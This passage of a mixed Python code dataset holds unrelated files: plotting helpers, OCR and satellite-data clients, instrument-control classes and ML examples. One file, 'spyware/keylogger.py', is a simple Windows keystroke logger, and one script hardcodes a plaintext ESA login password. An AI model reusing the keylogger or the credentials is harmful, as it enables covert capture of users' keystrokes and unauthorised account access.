0.0\n\n elif objective == 'minimize':\n if x <= lower:\n y = 1.0\n else:\n y = 0.0\n\n elif objective == 'range':\n if lower <= x <= upper:\n y = 1.0\n else:\n y = 0.0\n\n else:\n print(\"linThresh objective must be either \\'minimize\\' or \\'maximize\\' or \\'range\\'\")\n raise\n\n return y\n\n\ndef gauss(x: float, objective: str, mu: float, sigma: float, **kwargs):\n \"\"\"\n\n :param x:\n :param objective:\n :param mu:\n :param sigma:\n :param std:\n :param kwargs:\n :return:\n \"\"\"\n\n if objective == 'maximize':\n if x >= mu:\n y = 1.0\n else:\n y = np.exp(-0.5 * np.power((x - mu) / sigma, 2.))\n elif objective == 'minimize':\n if x <= mu:\n y = 1.0\n else:\n y = np.exp(-0.5 * np.power((x - mu) / sigma, 2.))\n elif objective == 'range':\n y = np.exp(-0.5 * np.power((x - mu) / sigma, 2.))\n else:\n print(\"linThresh objective must be either \\'minimize\\' or \\'maximize\\' or \\'range\\'\")\n raise\n\n return y\n\n\ndef plot_mod(mod, func_kwargs: dict):\n X = np.linspace(0, 1, 101)\n Y = [mod(x, **func_kwargs) for x in X]\n plt.plot(X, Y, label=func_kwargs)\n plt.xlabel('x')\n plt.ylabel('modified x')\n plt.title(mod.__name__)\n plt.legend()\n plt.show()\n return\n\n\ndef plot_mod_objectives(mod, non_objective_kwargs: dict):\n objectives = ['maximize', 'minimize']\n if mod.__name__ != 'norm':\n objectives.append('range')\n\n X = np.linspace(0, 1, 101)\n\n fig, axes = plt.subplots(ncols=len(objectives), nrows=1, sharex=True, sharey=False, figsize=(6*len(objectives), 4))\n for objective, ax in zip(objectives, axes.flatten()):\n Y = [mod(x, objective=objective, **non_objective_kwargs) for x in X]\n ax.plot(X, Y, label=non_objective_kwargs)\n ax.set_xlabel('x')\n ax.set_ylabel('modified x')\n ax.set_title(objective)\n ax.legend()\n plt.suptitle(mod.__name__)\n plt.show()\n return\n","sub_path":"molscore/utils/score_modifiers.py","file_name":"score_modifiers.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"393534628","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n if numRows ==1:\n return s\n ans = [\"\" for i in range(numRows)]\n i,flag=0,-1\n for v in s:\n ans[i] +=v\n if i==0 or i==numRows-1:#主要是遇到邊緣就是改變符號..\n flag = -flag\n i+=flag\n return ''.join(ans)\n\n\"\"\"\n6. Z 字形变换\n将一个给定字符串根据给定的行数,以从上往下、从左到右进行 Z 字形排列。\n\n比如输入字符串为 \"LEETCODEISHIRING\" 行数为 3 时,排列如下:\n\nL C I R\nE T O E S I I G\nE D H N\n之后,你的输出需要从左往右逐行读取,产生出一个新的字符串,比如:\"LCIRETOESIIGEDHN\"。\n\n请你实现这个将字符串进行指定行数变换的函数:\n\nstring convert(string s, int numRows);\n示例 1:\n\n输入: s = \"LEETCODEISHIRING\", numRows = 3\n输出: \"LCIRETOESIIGEDHN\"\n示例 2:\n\n输入: s = \"LEETCODEISHIRING\", numRows = 4\n输出: \"LDREOEIIECIHNTSG\"\n解释:\n\nL D R\nE O E I I\nE C I H N\nT S G\n\"\"\"\n","sub_path":"z字行按行排列.py","file_name":"z字行按行排列.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"567585380","text":"import io\nimport os\nimport io\nfrom google.cloud import vision\nfrom google.cloud.vision import types\nimport json\nfrom google.protobuf.json_format import MessageToJson\nfrom google.protobuf.json_format import MessageToDict\n\n# from .models import RawJson\n\n\nclass GoogleVisionApi:\n\n def __init__(self):\n #export GOOGLE_APPLICATION_CREDENTIALS=\"/Users/mtottrup/Desktop/BcLiqScanv1-6326a79539e7.json\"\n self.client = vision.ImageAnnotatorClient()\n\n\n def ocr_image(self, image_model):\n # file_name = os.path.join(\n # os.path.dirname(__file__),\n # 'resources/wakeupcat.jpg')\n\n # # Loads the image into memory\n # with io.open(file_name, 'rb') as image_file:\n # content = image_file.read()\n client = vision.ImageAnnotatorClient()\n content = image_model.binary.read()\n\n image = vision.types.Image(content=content)\n\n # Performs label detection on the image file\n response = client.text_detection(image=image)\n #texts = response.text_annotations\n texts = MessageToDict(response)\n #print('Texts:')\n # output = \"OCR Output:\"\n\n # for text in texts:\n # output += '\\n\"{}\"'.format(text.description)\n\n # vertices = (['({},{})'.format(vertex.x, vertex.y)\n # for vertex in text.bounding_poly.vertices])\n\n # output += 'bounds: {}'.format(','.join(vertices))\n\n # todo: Get the file name\n\n res_json = json.dumps(texts)\n\n # with open('jsons/name.txt', 'wb+') as destination:\n # destination.write(res_json)\n\n # import pdb; pdb.set_trace()\n\n # document.rawjson_set.create(\n # document = document,\n # name=\"Untitled\",\n # file=destination\n # )\n\n # document.save()\n\n\n #print(res_json)\n\n return res_json\n\n\n\n\n def label_image(self, document):\n\n # Instantiates a client\n client = vision.ImageAnnotatorClient()\n\n # The name of the image file to annotate\n content = document.image.file.read()\n\n # Loads the image into memory\n # with io.open(file_name, 'rb') as image_file:\n # content = image_file.read()\n\n image = types.Image(content=content)\n\n # Performs label detection on the image file\n response = client.label_detection(image=image)\n labels = response.label_annotations\n\n print('Labels:')\n for label in labels:\n print(label.description)\n\n\n\n# Imports the Google Cloud client library\n\n# Instantiates a client\n\n\n# The name of the image file to annotate\n","sub_path":"receipts/receiptreader/google_vision_api.py","file_name":"google_vision_api.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"416681336","text":"\n\n\nbytes = b'\\x18\\x00\\x03w\\xff\\xff\\x0099\\x05\\xff\\xff\\xff\\xff'\n# bytes = b'k\\xfa\\xff\\x12\\xdf\\xff\\x16\\xe1\\xff\\xd8\\xba\\xff\\xc5\\xe4\\xff\\xff\\xe7\\xffx\\xf1\\xff \\xd0\\xff\\xfd\\xcb\\xffU\\xb7\\xffl\\x93\\xff\\xc5\\x89\\xffzx\\xff\\xd8\\x83\\xff]\\x89\\xff\\x9e\\x96\\xff,\\xb5\\xffV\\xc4\\xff\\xbd\\xac\\xff\\x10\\x9f\\xffM\\xc5\\xff0\\xd7\\xff\\xad\\xce\\xff\\xd9\\xc1\\xff\\xf2\\x9e\\xff\\xfe\\xa4\\xff\\x00\\xa3\\xff\\xf9\\x9e\\xff\"\\x94\\xff:\\xa7\\xffg\\xa7\\xff\\xd4\\xaf\\xff\\xa1\\xb2'\n\ncadena = str(bytes)\ncadena = cadena.splitlines()\nprint(cadena)\nsalida = [];\nmovidita = cadena[0].split(\"'\")[1].split('\\\\')\nprint(movidita)\nmovidita.pop(0)\nfor lines in movidita:\n print(lines)\n binary = bin(int(lines[1:3],16))[2:] #Cogemos toda la trama sin x y sin otro valor\n print(binary)\n print(len(binary))\n i = 0\n sum = \"0\"\n if len(binary) != 8: # PARA EL FORMATO DE 8 BITS\n for i in range(int(len(binary)), 7):\n sum += \"0\"\n binary = sum + binary\n print(binary)\n else:\n print(binary)\n salida.append(binary)\n\nsalida = \"\".join(salida)\nprint(salida)\naudio = []\nfor i in salida:\n audio.append(int(i))\n\n\nprint(audio)\n","sub_path":"movidita.py","file_name":"movidita.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650179374","text":"import fetchESA\nimport logging\n\n\n# --- set logging behaviour\nlogging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\nlogging.info('Started')\n\nobj = fetchESA.sentinel()\n\n\n# --- set query authentification\nobj.query_auth('sebastien.valade', 'wave*worm')\n\n\n# --- set query options\n# 'filename'\n# 'platformname': Sentinel-1 | Sentinel-2\n# 'format': 'json'\n# 'polarisationmode'\n# 'productType'\n# 'aoi': (lat, lon) | (lon1, lat1, lon2, lat2)\noptns = {\n 'filename': 'S1A*',\n 'productType': 'SLC',\n 'maxrecords': 3}\n\n# --- query product\nproductlist = obj.product_search(optns, export_result=None)\n\n# print(productlist[0]['title'])\n# print(productlist[0]['uuid'])\n\n# --- download product\nobj.product_fetch(productlist)\n\nlogging.info('Finished')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"479733235","text":"#-*-coding: utf-8-*-\nfrom ctypes import *\nfrom sys import stdout\nfrom time import sleep\ngas = cdll.user32.GetAsyncKeyState\n\ndef main():\n\tfor i in range(0, 256):\n\t\ti = gas()\n\ttext = \"\"\n\twhile \"Z\" not in text:\n\t\tfor i in range(0, 255):\n\t\t\tif gas(i):\n\t\t\t\ttext += chr(i)\n\t\t\tsleep(0.0000000000001)\n\t\tstdout.flush()\n\tprint(text)\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"spyware/keylogger.py","file_name":"keylogger.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"152718301","text":"import visa\nfrom functions import cast, readBuffer, error_V, error_I\n\nclass smu2612b:\n \n def __init__(self, address):\n rm = visa.ResourceManager()\n equipment_id = 'GPIB0::' + str(address) + '::INSTR'\n \n self.smu = rm.open_resource(equipment_id)\n self.name = \"SMU2612B\"\n \n self.smu.write('smua.reset()')\n self.smu.write('smub.reset()')\n self.smu.write('reset()')\n \n self.smu.write('format.data = format.ASCII')\n \n # Buffer operations -------------------------------------------------------\n \n self.smu.write('smua.nvbuffer1.clear()')\n self.smu.write('smub.nvbuffer1.clear()')\n \n self.smu.write('smua.nvbuffer1.appendmode = 1')\n self.smu.write('smub.nvbuffer1.appendmode = 1')\n \n self.smu.write('smua.nvbuffer1.collectsourcevalues = 1')\n self.smu.write('smub.nvbuffer1.collectsourcevalues = 1')\n \n self.smu.write('smua.measure.count = 1')\n self.smu.write('smub.measure.count = 1')\n \n return\n \n def setup(self, config):\n \n [enable_a,\n source_a_cc,\n measure_a_cc,\n source_a_rang,\n measure_a_rang,\n source_a,\n measure_a,\n NPLC_a,\n delay_a,\n enable_b,\n source_b_cc,\n measure_b_cc,\n source_b_rang,\n measure_b_rang,\n source_b,\n measure_b,\n NPLC_b,\n delay_b] = config\n \n \n if enable_a == 1:\n if source_a == 'V' and measure_a == 'I':\n self.measure_a = 'I'\n \n # ------------------------------------------------------------------------- \n # smua configuration\n \n self.smu.write('smua.source.func = smua.OUTPUT_DCVOLTS')\n self.smu.write('smua.measure.func = smua.OUTPUT_DCAMPS')\n self.smu.write('display.smua.measure.func = display.MEASURE_DCAMPS')\n \n if (measure_a_rang == 'AUTO'):\n self.smu.write('smua.source.autorangei = smua.AUTORANGE_ON')\n else:\n self.smu.write('smua.source.rangei = ' + str(measure_a_rang))\n \n if (source_a_rang == 'AUTO'):\n self.smu.write('smua.measure.autorangev = smua.AUTORANGE_ON')\n else:\n self.smu.write('smua.measure.rangev = ' + str(source_a_rang))\n \n #compliance values for I and V\n self.smu.write('smua.source.limiti = ' + str(measure_a_cc))\n self.smu.write('smua.source.limitv = ' + str(source_a_cc))\n \t\n self.smu.write('smua.measure.nplc = ' + str(NPLC_a))\n self.smu.write('smua.measure.delay = ' + str(delay_a))\n \n else:\n print(\"source/measure quantity invalid.\")\n \n else:\n print(\"Channel a not enabled.\")\n\n \n if enable_b == 1:\n if source_b == 'I' and measure_b == 'V':\n self.measure_b = 'V'\n \n # ------------------------------------------------------------------------- \n # smua configuration\n \n self.smu.write('smub.source.func = smub.OUTPUT_DCAMPS')\n self.smu.write('smub.measure.func = smub.OUTPUT_DCVOLTS')\n self.smu.write('display.smub.measure.func = display.MEASURE_DCVOLTS')\n \n if (measure_b_rang == 'AUTO'):\n self.smu.write('smub.source.autorangei = smub.AUTORANGE_ON')\n else:\n self.smu.write('smub.source.rangei = ' + str(measure_b_rang))\n \n if (source_b_rang == 'AUTO'):\n self.smu.write('smub.measure.autorangev = smub.AUTORANGE_ON')\n else:\n self.smu.write('smub.measure.rangev = ' + str(source_b_rang))\n \n #compliance values for I and V\n self.smu.write('smub.source.limiti = ' + str(measure_b_cc))\n self.smu.write('smub.source.limitv = ' + str(source_b_cc))\n \t\n self.smu.write('smub.measure.nplc = ' + str(NPLC_b))\n self.smu.write('smub.measure.delay = ' + str(delay_b))\n \n else:\n print(\"source/measure quantity invalid.\")\n \n else:\n print(\"Channel b not enabled.\")\n \n def measure(self, channel, option=True):\n if channel == 'a':\n measure_func = self.measure_a\n elif channel == 'b':\n measure_func = self.measure_b\n \n self.smu.write('smu%s.source.output = smu%s.OUTPUT_ON' % (str(channel), str(channel)))\n \n if measure_func == 'I':\n self.smu.write('smu%s.measure.i(smu%s.nvbuffer1)' % (str(channel), str(channel)))\n elif measure_func == 'V':\n self.smu.write('smu%s.measure.v(smu%s.nvbuffer1)' % (str(channel), str(channel)))\n else:\n print(\"Invalid SMU channel\")\n \n if option:\n self.smu.write('smu%s.source.output = smu%s.OUTPUT_OFF' % (str(channel), str(channel)))\n return\n\n\nclass smu2400:\n \n def __init__(self, address):\n rm = visa.ResourceManager()\n equipment_id = 'GPIB0::' + str(address) + '::INSTR'\n \n self.smu = rm.open_resource(equipment_id)\n self.name = \"SMU2400\"\n \n self.smu.write(\"*RST\")\n \n return\n \n \nclass Experiment:\n \n def __init__(self, v, instrument_setup, experiment_setup):\n self.instruments = []\n for i in range(len(v)):\n self.instruments.append(v)\n \n for i in range(len(self.instruments)):\n print(\"Instruments in experiment:\")\n print(\"%s. %s\" % (i, self.instruments[i].name))\n self.instruments[i].setup(instrument_setup[i])\n \n self.experiment_setup = experiment_setup\n return\n \n def iv_curve(self, channel):\n \n \"\"\"\n \n Function to perform iv curve with smu2612b\n \n \"\"\"\n [start, end, step] = self.experiment_setup\n output_flag = False\n \n if channel == 'a':\n source_func = self.instruments[0].measure_a\n elif channel == 'b':\n source_func = self.instruments[0].measure_b\n \n j = start\n while j <= end:\n if source_func == 'V':\n self.instruments[0].smu.write('smu%s.source.levelv = %s' % (str(channel), str(j)))\n elif source_func == 'I':\n self.instruments[0].smu.write('smu%s.source.leveli = %s' % (str(channel), str(j))) \n \n self.instruments[0].smu.measure(channel, output_flag)\n j += step\n \n if not output_flag:\n self.instruments[0].smu.write('smu%s.source.output = smu%s.OUTPUT_OFF' % (str(channel), str(channel)))\n \n readings_measure = cast(readBuffer(self.instruments[0].smu, str(channel))[1])\n readings_source = cast(readBuffer(self.instruments[0].smu, str(channel))[0])\n \n readings_source_error = error_V(readings_source, '2612')\n readings_measure_error = error_I(readings_measure, '2612')\n \n import matplotlib.pyplot as plt\n plt.errorbar(readings_source, readings_measure, \n xerr=readings_source_error, yerr=readings_measure_error, fmt='.')\n \n return [readings_source, readings_measure, readings_source_error, readings_measure_error]\n \n \n \n \n","sub_path":"Codigos/Codigo Labosat Clases/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"620389853","text":"\ndef gradiern_descent(square,room,price,alpha,theta0,theta1,theta2,max_iter):\n \"\"\"线性回归,梯度下降算法\n :param square: 训练集种的自变量\n :param room: 训练集种的自变量\n\t:param price: 训练集种的因变量\n\t:param theta0,theta1,theta2: 待求的权值\n\t:param alpha: 学习速率\n\t:param max_iter: 最大迭代次数\n \"\"\"\n\n deviation=1\n iter=0\n while deviation>0.0001 and iter maxy else maxy\n ty = np.min(y)\n miny = ty if ty < miny else miny\n plt.plot(np.log(x+1), y, color=self.color, alpha=alpha)\n # plt.plot(x, y, color=self.color, alpha=alpha)\n modif = self.set_tick_labels(ax, miny, maxy)\n plt.ylabel('Density'+modif)\n elif typ == 'se':\n alpha = np.min((1, 2.0/len(data)))\n for subj in data:\n x = np.linspace(1, len(data[subj]), len(data[subj]))\n y = data[subj]\n ty = np.max(y)\n maxy = ty if ty > maxy else maxy\n ty = np.min(y)\n miny = ty if ty < miny else miny\n plt.plot(x, y, color=self.color, alpha=alpha)\n modif = self.set_tick_labels(ax, miny, maxy)\n if tit is 'Spectrum':\n plt.ylabel('Eigenvalue'+modif)\n else:\n plt.ylabel('Portion of Total Variance')\n elif typ == 'sc':\n x = 0\n y = data.values()\n if len(y) <= 1:\n plt.scatter(0, y, color=self.color)\n plt.xlim([-0.5, 0.5])\n else:\n voil = plt.violinplot(y)\n voil['bodies'][0].set_color(self.color)\n plt.ylabel('Count')\n\n if typ == 'sc':\n plt.ylim([np.min(y)*0.9, np.max(y)*1.1])\n plt.xticks([])\n plt.yticks([np.min(y), np.max(y)])\n else:\n if typ == 'se':\n plt.xlim([np.min(x), np.max(x)])\n plt.xticks([np.min(x), np.max(x)])\n else:\n # plt.xlim([np.min(x), np.max(x)])\n # plt.xticks([np.min(x), np.max(x)])\n plt.xlim([np.min(np.log(x+1)), np.max(np.log(x+1))])\n plt.xticks([np.min(np.log(x+1)), np.max(np.log(x+1))])\n plt.ylim([miny, maxy])\n plt.yticks([miny, ((maxy - miny)/2), maxy])\n\n plt.title(tit, y=1.04)\n\n def rand_jitter(self, arr):\n stdev = .03*(max(arr)-min(arr)+2)\n return arr + np.random.randn(len(arr)) * stdev\n\n def factors(self, N):\n factors = [subitem for subitem in [(i, N//i)\n for i in range(1, int(N**0.5) + 1)\n if N % i == 0 and i > 1]]\n return set([fact for item in factors for fact in item])\n","sub_path":"ndmg/stats/plot_metrics.py","file_name":"plot_metrics.py","file_ext":"py","file_size_in_byte":7331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"402761174","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 28 15:16:22 2019\n\n@author: jack\n\"\"\"\n\nimport pandas as pd\nimport time\nimport pydotplus\nimport graphviz\n\nfrom sklearn import ensemble\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import tree\n\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=Warning)\ny2015 = pd.read_csv('local loan data.csv',nrows=5000)\n\ny2015 = y2015[:-2]\ny2015['id'] = pd.to_numeric(y2015['id'], errors='coerce')\ny2015['int_rate'] = pd.to_numeric(y2015['int_rate'].str.strip('%'), errors='coerce')\n\ny2015.drop(y2015.columns[[20, 95]], axis=1, inplace=True)\nX = y2015.drop('loan_status', 1)\nY = y2015['loan_status']\nX = pd.get_dummies(X)\nX = X.dropna(axis=1)\n\nstart = time.time()\nrfc = ensemble.RandomForestClassifier()\n\nensemble = cross_val_score(rfc, X, Y, cv=5)\nensemble_time = time.time() - start\n\n# Initialize and train our tree.\ntree_time = time.time()\ndecision_tree = tree.DecisionTreeClassifier(\n criterion='entropy',\n max_features=1,\n max_depth=7,\n)\nx=X\ny=Y\n#decision_tree.fit(customers, repeat_customer)\ndecision_tree.fit(x,y)\n\n# Render our tree.\ndot_data = tree.export_graphviz(\n decision_tree, out_file=None,\n feature_names=X.columns,\n filled=True\n)\n\nprint(\"Tree:\" )\nprint(cross_val_score(rfc, x, y, cv=5))\nprint(\"tree time = {:0.4f}\".format(time.time()-start))\n\nprint(\"Ensemble:\" )\nprint (ensemble)\nprint(\"ensemble time = {:0.4f}\".format(ensemble_time))\nprint(\"end\")\n","sub_path":"Random forest - guided example.py","file_name":"Random forest - guided example.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"421324217","text":"import time\nimport page_elements\nfrom datetime import datetime\nfrom logger_settings import ui_logger\nfrom scripts.crpo.event import event_excel\nfrom scripts.crpo.common import button_click\n\n\nclass CreateEvent(event_excel.EventExcelRead):\n def __init__(self):\n super(CreateEvent, self).__init__()\n\n now = datetime.now()\n self.event_date = now.strftime(\"%d/%m/%Y\")\n\n # --------------- Value initialization ----------------\n self.validation_check = ''\n self.get_event_name = []\n\n self.ui_create_event = ''\n self.event_validation_check = ''\n\n def create_event(self):\n try:\n self.event_tab()\n\n self.web_element_click_xpath(page_elements.buttons['create'])\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Name\"),\n self.event_sprint_version)\n\n time.sleep(4)\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Requirement\"),\n self.req_name_sprint_version)\n time.sleep(1.5)\n self.drop_down_selection()\n\n self.web_element_click_xpath(page_elements.event['job_field'])\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Search\"),\n self.job_name_sprint_version)\n\n self.web_element_click_xpath(page_elements.multi_selection_box['moveAllItemsRight'])\n button_click.all_buttons(self, 'Done')\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Slot\"),\n self.xl_slot)\n self.drop_down_selection()\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"From\"),\n self.event_date)\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"To\"),\n self.event_date)\n\n self.web_element_send_keys_xpath(page_elements.text_fields['place_holder'].format(\"Reporting Date\"),\n self.event_date)\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"Event Manager\"),\n self.xl_em)\n self.drop_down_selection()\n\n self.web_element_send_keys_xpath(page_elements.text_fields['text_field'].format(\"College\"),\n self.xl_college)\n self.drop_down_selection()\n\n self.web_element_click_xpath(page_elements.event['ec_enable'])\n\n self.driver.execute_script(\"window.scrollTo(0,100);\")\n button_click.button(self, 'Create')\n\n # ------------------------------- Validating event ---------------------------------------------------------\n self.driver.execute_script(\"window.scrollTo(0,-100);\")\n self.getby_details_screen(self.event_sprint_version)\n if self.header_name.strip() == self.event_sprint_version:\n print('**-------->>> Event Validated and continuing '\n 'with created event :: {}'.format(self.event_sprint_version))\n print('**-------->>> Event created successfully')\n self.ui_create_event = 'Pass'\n self.event_validation_check = 'Pass'\n else:\n print('Failed to create event <<<--------**')\n print('Event validation failed Or event creation failed <<<--------**')\n\n except Exception as error:\n ui_logger.error(error)\n","sub_path":"scripts/crpo/event/create_event.py","file_name":"create_event.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"166556936","text":"from flask import g\nfrom plynx.db.demo_user_manager import DemoUserManager\nfrom plynx.web.common import app, requires_auth, make_fail_response\nfrom plynx.utils.common import JSONEncoder\n\n\ndemo_user_manager = DemoUserManager()\n\n\n@app.route('/plynx/api/v0/token', strict_slashes=False)\n@requires_auth\ndef get_auth_token():\n access_token = g.user.generate_access_token()\n refresh_token = g.user.generate_refresh_token()\n return JSONEncoder().encode({\n 'access_token': access_token.decode('ascii'),\n 'refresh_token': refresh_token.decode('ascii')\n })\n\n\n@app.route('/plynx/api/v0/demo', methods=['POST'])\ndef post_demo_user():\n user = demo_user_manager.create_demo_user()\n if not user:\n return make_fail_response('Failed to create demo user')\n demo_user_manager.create_demo_graphs(user)\n\n access_token = user.generate_access_token(expiration=1800)\n return JSONEncoder().encode({\n 'access_token': access_token.decode('ascii'),\n 'refresh_token': 'Not assigned',\n 'username': user.username\n })\n","sub_path":"plynx/web/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"378190506","text":"import pickle\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nif __name__ == \"__main__\":\n with open(\"dataset.pickle\", \"rb\") as f:\n data = pickle.load(f)\n\n features_train = data[0]\n tags_train = data[1]\n features_test = data[2]\n tags_test = data[3]\n # print (features_test.shape, tags_test.shape)\n\n neigh = DecisionTreeClassifier()\n neigh.fit(features_train, tags_train)\n pred = neigh.predict(features_test)\n # print(pred, tags_train)\n pred = list(pred)\n tags_test = list(tags_test)\n # print(\"prediction: \", pred[:])\n # print(\"test tags: \", tags_test[:])\n mae = 0\n for i in range(len(pred)):\n mae += abs(pred[i] - tags_test[i])\n print(\"DT MAE: \", float(mae) / len(pred))\n\n","sub_path":"artifacts/Clara/MS_scale_out/baselines/train_dt.py","file_name":"train_dt.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"152012250","text":"import face_alignment\nimport cv2,os\nimport numpy as np\nfrom configs import configs\nfrom faced import FaceDetector\nfrom faced.utils import annotate_image\nfrom training.insight_face import InsightFace\nfrom training.utils_alignment import execute_alignment\nfrom training.utils_insightface import get_embedding\nimport tensorflow as tf\n\n\n\n\nframe_interval=3\ndef webcam_face_recognizer(database):\n \"\"\"\n Runs a loop that extracts images from the computer's webcam and determines whether or not\n it contains the face of a person in our database.\n\n If it contains a face, an audio message will be played welcoming the user.\n If not, the program will process the next frame from the webcam\n \"\"\"\n\n cv2.namedWindow(\"preview\")\n vc = cv2.VideoCapture(0)\n face_descriptor = InsightFace(model_fp=configs.face_descriptors_model_fp, \n input_tensor_names=configs.face_descriptors_input_names,\n output_tensor_names=configs.face_descriptors_output_names,\n device=configs.face_descriptors_device)\n \n face_alignment_predictor = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D,flip_input=False)\n face_detector = FaceDetector()\n c=0\n while vc.isOpened():\n _, frame = vc.read()\n rgb_img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n \n timeF = frame_interval\n if(c==0):\n bboxes = face_detector.predict(rgb_img)\n frame = process_frame(bboxes, frame, face_descriptor, face_alignment_predictor) \n ann_img = annotate_image(frame, bboxes)\n c=(c+1)%timeF\n key = cv2.waitKey(100)\n cv2.imshow(\"preview\", ann_img)\n\n if key == 27: # exit on ESC\n break\n cv2.destroyWindow(\"preview\")\n\ndef process_frame(bboxes, frame, face_descriptor,face_alignment_predictor):\n \"\"\"\n Determine whether the current frame contains the faces of people from our database\n \"\"\"\n \n for (x, y, w, h, prob) in bboxes:\n x1 = int(x - w/2)\n y1 = int(y - h/2)\n x2 = int(x + w/2)\n y2 = int(y + h/2)\n identity = find_identity(frame, x1, y1, x2, y2,face_descriptor,face_alignment_predictor)\n # Draw a label with a name below the face\n cv2.rectangle(frame, (x1, y2), (x2, y2+30), (0, 255, 0), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, identity, (x1 + 6, y2 + 18), font, 1.0, (255, 255, 255), 1)\n\n return frame\n\ndef find_identity(frame, x1, y1, x2, y2,face_descriptor,face_alignment_predictor):\n \"\"\"\n Determine whether the face contained within the bounding box exists in our database\n\n x1,y1_____________\n | |\n | |\n |_________________x2,y2\n\n \"\"\"\n height, width, channels = frame.shape\n # The padding is necessary since the OpenCV face detector creates the bounding box around the face and not the head\n part_image = frame[max(0, y1):min(height, y2), max(0, x1):min(width, x2)]\n # FACE ALIGNMENT HERE\n landmarks=face_alignment_predictor.get_landmarks(part_image)\n if(landmarks!=[] and landmarks!=None):\n part_image=execute_alignment(part_image,landmarks)\n prediction=get_embedding(part_image,face_descriptor)\n return who_is_it(database,prediction)\n \n\ndef who_is_it(database,encoding,epsilon=800):\n \"\"\"\n Arguments:\n image_path -- path to an image\n database -- database containing image encodings along with the name of the person on the image\n model -- your Inception model instance in Keras\n \n Returns:\n min_dist -- the minimum distance between image_path encoding and the encodings from the database\n identity -- string, the name prediction for the person on image_path\n \"\"\"\n identity = \"Unknown\"\n # Loop over the database dictionary's names and encodings.\n i=0\n for db_enc in database[\"encodings\"]:\n cosine_similarity=face_compare(encoding, db_enc)\n if cosine_similarity < epsilon:\n identity = database[\"names\"][i]\n break\n i+=1\n return identity\n\nif __name__ == \"__main__\":\n database = prepare_database()\n webcam_face_recognizer(database)\n \n\n\n","sub_path":"livestream/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"213505152","text":"from tkinter import Button, Label, Tk\r\nroot = Tk()\r\ntime = 0\r\nafter_id = \"\"\r\nstate = False\r\ndef get_time():\r\n global time\r\n return str((time // 600000)%6) + str((time // 60000)%10) + ':'+str((time // 10000)%6) + str((time // 1000)%10) +':'+ str((time // 100)%10) + str((time // 10)%10) + str(time %10)\r\ndef start_clock():\r\n global time, after_id\r\n after_id = root.after(1, start_clock)\r\n text.configure(text = get_time())\r\n time +=1\r\ndef stop_clock():\r\n global after_id\r\n root.after_cancel(after_id)\r\ndef cmd():\r\n global state\r\n if not state:\r\n state = True\r\n reset.configure(state = \"disable\")\r\n start_and_stop.configure(text = \"Stop\")\r\n start_clock()\r\n else:\r\n state = False\r\n reset['state']=\"active\"\r\n start_and_stop.configure(text = \"Start\")\r\n stop_clock()\r\ndef reset_clock():\r\n global time\r\n time = 0\r\n text.configure(text=get_time())\r\ntext = Label(font = (\"Arial\", 30), text = get_time())\r\ntext.grid(row = 0, column = 0)\r\nstart_and_stop = Button(font = (\"Arial\", 30), text = \"Start\", command = cmd, width = 5, height = 1)\r\nstart_and_stop.grid(row = 0, column = 1)\r\nreset = Button(font = (\"Arial\", 30), text = \"Reset\", command = reset_clock, width = 5, height = 1)\r\nreset.grid(row = 0, column = 2)\r\nroot.geometry(\"450x200\")\r\nroot.mainloop()","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"126808726","text":"import pandas as pd\nimport sys\nimport datetime\n\nITEM_MASTER_CSV_PATH=\"./item_master.csv\"\nRECEIPT_FOLDER=\"./receipt\"\n\n### 商品クラス\nclass Item:\n def 